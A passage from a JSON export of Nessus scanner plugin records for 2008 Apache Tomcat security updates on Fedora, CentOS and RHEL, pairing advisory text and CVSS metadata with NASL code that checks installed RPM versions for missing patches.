\"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"FEDORA\", value:\"2008-8113\");\n\n script_name(english:\"Fedora 9 : tomcat5-5.5.27-0jpp.2.fc9 (2008-8113)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com>\n 0:5.5.27-0jpp.2\n\n - add commons-io symlink\n\n - Mon Sep 15 2008 David Walluck <dwalluck at redhat.com>\n 0:5.5.27-0jpp.1\n\n - 5.5.27 Resolves: rhbz#456120 Resolves: rhbz#457934\n Resolves: rhbz#446393 Resolves: rhbz#457597\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=446393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457934\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014390.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?776be90a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat5 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"tomcat5-5.5.27-0jpp.2.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:59:22", "description": "Updated tomcat packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the HttpServletResponse.sendError() method. A remote attacker could inject arbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host manager application. A remote attacker could inject arbitrary web script or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher in combination with a servlet or JSP. A remote attacker could utilize a specially crafted request parameter to access protected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the 'allowLinking' and 'URIencoding' settings were activated. A remote attacker could use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain backported patches to resolve these issues.", "cvss3": {}, "published": "2010-01-06T00:00:00", "type": "nessus", "title": "CentOS 5 : tomcat5 (CESA-2008:0648)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tomcat5", "p-cpe:/a:centos:centos:tomcat5-admin-webapps", "p-cpe:/a:centos:centos:tomcat5-common-lib", "p-cpe:/a:centos:centos:tomcat5-jasper", "p-cpe:/a:centos:centos:tomcat5-jasper-javadoc", "p-cpe:/a:centos:centos:tomcat5-jsp-2.0-api", "p-cpe:/a:centos:centos:tomcat5-jsp-2.0-api-javadoc", "p-cpe:/a:centos:centos:tomcat5-server-lib", "p-cpe:/a:centos:centos:tomcat5-servlet-2.4-api", "p-cpe:/a:centos:centos:tomcat5-servlet-2.4-api-javadoc", "p-cpe:/a:centos:centos:tomcat5-webapps", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2008-0648.NASL", "href": "https://www.tenable.com/plugins/nessus/43703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0648 and \n# CentOS Errata and Security Advisory 2008:0648 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43703);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"RHSA\", value:\"2008:0648\");\n\n script_name(english:\"CentOS 5 : tomcat5 (CESA-2008:0648)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tomcat packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the\nhost manager application. A remote attacker could inject arbitrary web\nscript or HTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a\nRequestDispatcher in combination with a servlet or JSP. A remote\nattacker could utilize a specially crafted request parameter to access\nprotected web resources. (CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n'allowLinking' and 'URIencoding' settings were activated. A remote\nattacker could use a UTF-8-encoded request to extend their privileges\nand obtain local files accessible to the Tomcat process.\n(CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015217.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eaa054e7\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015218.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8ad3363\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-common-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-jasper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-jasper-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-jsp-2.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-jsp-2.0-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-server-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-servlet-2.4-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-servlet-2.4-api-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat5-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-admin-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-common-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-jasper-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-jasper-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-jsp-2.0-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-jsp-2.0-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-server-lib-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-servlet-2.4-api-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-servlet-2.4-api-javadoc-5.5.23-0jpp.7.el5_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"tomcat5-webapps-5.5.23-0jpp.7.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat5 / tomcat5-admin-webapps / tomcat5-common-lib / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:52", "description": "This release fixes several security-related issues. In addition, this release fixes several user-reported problems related to the startup scripts and file layout.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2008-09-12T00:00:00", "type": "nessus", "title": "Fedora 9 : tomcat6-6.0.18-1.1.fc9 (2008-7977)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tomcat6", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2008-7977.NASL", "href": "https://www.tenable.com/plugins/nessus/34185", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-7977.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34185);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"FEDORA\", value:\"2008-7977\");\n\n script_name(english:\"Fedora 9 : tomcat6-6.0.18-1.1.fc9 (2008-7977)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This release fixes several security-related issues. In addition, this\nrelease fixes several user-reported problems related to the startup\nscripts and file layout.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=446393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457934\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014243.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a1b6d4c0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"tomcat6-6.0.18-1.1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat6\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:58:00", "description": "Updated tomcat packages that fix multiple security issues are now available for Red Hat Network Satellite Server.\n\nThis update has been rated as having low security impact by the Red Hat Security Response Team.\n\nThis update corrects several security vulnerabilities in the Tomcat component shipped as part of Red Hat Network Satellite Server. In a typical operating environment, Tomcat is not exposed to users of Satellite Server in a vulnerable manner. These security updates will reduce risk in unique Satellite Server environments.\n\nMultiple flaws were fixed in the Apache Tomcat package.\n(CVE-2008-1232, CVE-2008-1947, CVE-2008-2370, CVE-2008-2938, CVE-2008-3271)\n\nUsers of Red Hat Network Satellite Server 5.0 or 5.1 are advised to update to these Tomcat packages which resolve these issues.", "cvss3": {}, "published": "2010-01-10T00:00:00", "type": "nessus", "title": "RHEL 4 : tomcat in Satellite Server (RHSA-2008:1007)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938", "CVE-2008-3271"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat5", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2008-1007.NASL", "href": "https://www.tenable.com/plugins/nessus/43842", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1007. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43842);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-3271\");\n script_bugtraq_id(29502, 30494, 30496, 30633);\n script_xref(name:\"RHSA\", value:\"2008:1007\");\n\n script_name(english:\"RHEL 4 : tomcat in Satellite Server (RHSA-2008:1007)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tomcat packages that fix multiple security issues are now\navailable for Red Hat Network Satellite Server.\n\nThis update has been rated as having low security impact by the Red\nHat Security Response Team.\n\nThis update corrects several security vulnerabilities in the Tomcat\ncomponent shipped as part of Red Hat Network Satellite Server. In a\ntypical operating environment, Tomcat is not exposed to users of\nSatellite Server in a vulnerable manner. These security updates will\nreduce risk in unique Satellite Server environments.\n\nMultiple flaws were fixed in the Apache Tomcat package.\n(CVE-2008-1232, CVE-2008-1947, CVE-2008-2370, CVE-2008-2938,\nCVE-2008-3271)\n\nUsers of Red Hat Network Satellite Server 5.0 or 5.1 are advised to\nupdate to these Tomcat packages which resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://tomcat.apache.org/security-5.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1007\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat5 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1007\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n 